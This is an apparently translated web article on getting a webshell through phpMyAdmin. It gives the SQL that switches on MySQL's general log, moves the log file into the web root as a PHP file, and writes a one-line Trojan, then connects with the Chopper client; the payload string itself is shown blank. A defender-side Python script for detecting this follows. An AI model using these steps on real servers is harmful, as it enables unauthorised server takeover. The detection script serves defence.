What is the use of getshell in phpmyadmin

2025-03-29 Update. From: SLTechnology News&Howtos, Shulou (Shulou.com), 06/01

This article describes how getshell is used in phpMyAdmin.

phpMyAdmin is a PHP-based, web-based MySQL database management tool installed on the website's host, which lets administrators manage MySQL databases through a web interface. The web interface is a simpler way to enter complicated SQL, especially when importing and exporting large amounts of data. One of its bigger advantages is that phpMyAdmin runs on the web server like any other PHP program, while the HTML pages it generates can be used from anywhere, so the MySQL database can be managed remotely and databases and tables can be created, modified, and deleted easily. phpMyAdmin can also generate commonly used PHP syntax, which helps keep the SQL correct when writing web pages.

Put simply, it lets you operate the database conveniently from a web page.

Once we have the phpMyAdmin page of a site, the next step is getshell.

Privileges can be escalated by writing a shell, which requires the following conditions:

1. Database root permissions

2. Knowledge of the physical path to the website

3. The database has write permission

The shell is written with a statement of the form select '' INTO OUTFILE 'website physical path'

This article is mainly about achieving getshell when condition 3 is not satisfied.

Precondition: MySQL 5.0+

MySQL 5.0 and later automatically create log files, so the log file location can be changed by modifying global variables while the service is running, but you must have read and write permission to the directory where the log is generated.

(This may be stricter in a Linux environment, because the site directory belongs to one user and MySQL runs as another, with permissions strictly controlled. It mainly depends on whether the permissions are properly configured.)

First, let's test whether the site has write permission.

Execute the SQL statement SHOW VARIABLES LIKE 'secure_file_priv' to query the value of secure_file_priv.

secure-file-priv characteristics

The secure-file-priv parameter restricts LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() to a specified directory.

When the value of secure_file_priv is NULL, MySQL does not allow import or export.

When the value of secure_file_priv is /tmp/, MySQL import and export can only occur in the /tmp/ directory.

When secure_file_priv has no specific value, no restrictions are imposed on MySQL import or export.

The parameter can be set in the MySQL ini configuration file.

After testing, we find that we do not have write permission.

Next, two MySQL global variables come into play: general_log and general_log_file.

general_log is the state of the log. It has two values, ON and OFF: ON means enabled and OFF means disabled.

general_log_file is the path where the log is saved.

We can achieve getshell by writing a one-line webshell (a "one-sentence Trojan") to the MySQL log and moving the MySQL log path to the website directory.

Execute the SQL statement SHOW VARIABLES LIKE 'general_log%' as a pattern-match query.

Logging is turned off by default.

We execute the SQL statements

Set global general_log = "ON"; # enable the log
SET global general_log_file='physical path under the website'; # change the log path

Successfully created

Then execute a special query statement

Select''

We browse to 112233.php to verify, and the shell has been written successfully.

Finally, the "kitchen knife" (Chopper) webshell client is connected to get the site's webshell.
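A defender-side check for the technique described above, as an added example that is not part of the original article: it audits SHOW VARIABLES output and scans logged statements for runtime changes to general_log / general_log_file and for INTO OUTFILE targets that land in a web directory. The web-root list, extension list, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Assumed for this sketch: adjust web roots and script extensions to the host.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}
SET_LOG_FILE = re.compile(
    r"set\s+(?:global\s+|@@global\.)general_log_file\s*=\s*(['\"])(.+?)\1", re.I)
SET_LOG_ON = re.compile(
    r"set\s+(?:global\s+|@@global\.)general_log\s*=\s*['\"]?(?:on|1)\b", re.I)
INTO_FILE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+(['\"])(.+?)\1", re.I)

def risky_path(path):
    """True if a file written by mysqld would sit in a web root or run as a script."""
    p = PurePosixPath(path.replace("\\", "/"))
    return p.suffix.lower() in SCRIPT_EXTS or str(p).lower().startswith(WEB_ROOTS)

def audit_variables(variables):
    """Check SHOW VARIABLES output (name -> value) for the settings discussed above."""
    findings = []
    if variables.get("secure_file_priv") == "":
        findings.append("secure_file_priv is empty: import/export is unrestricted")
    log_on = str(variables.get("general_log", "OFF")).upper() in ("ON", "1")
    if log_on and risky_path(variables.get("general_log_file", "")):
        findings.append("general_log is ON and general_log_file is web-reachable")
    return findings

def scan_statements(lines):
    """Return (line_no, finding) for statements that redirect mysqld file output."""
    hits = []
    for no, line in enumerate(lines, 1):
        if m := SET_LOG_FILE.search(line):
            sev = "HIGH" if risky_path(m.group(2)) else "REVIEW"
            hits.append((no, f"{sev}: general_log_file set to {m.group(2)}"))
        elif SET_LOG_ON.search(line):
            hits.append((no, "REVIEW: general_log enabled at runtime"))
        elif m := INTO_FILE.search(line):
            sev = "HIGH" if risky_path(m.group(2)) else "REVIEW"
            hits.append((no, f"{sev}: file export to {m.group(2)}"))
    return hits

# Constructed sample statements (the directory is made up for the example).
SAMPLE_LOG = [
    "12 Query SHOW VARIABLES LIKE 'general_log%'",
    '12 Query set global general_log = "ON"',
    "12 Query SET global general_log_file='/var/www/html/112233.php'",
    "13 Query SELECT id FROM t INTO OUTFILE '/tmp/export.csv'",
]
```

Calling scan_statements(SAMPLE_LOG) flags lines 2 to 4; only the general_log_file change into the web directory is rated HIGH.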
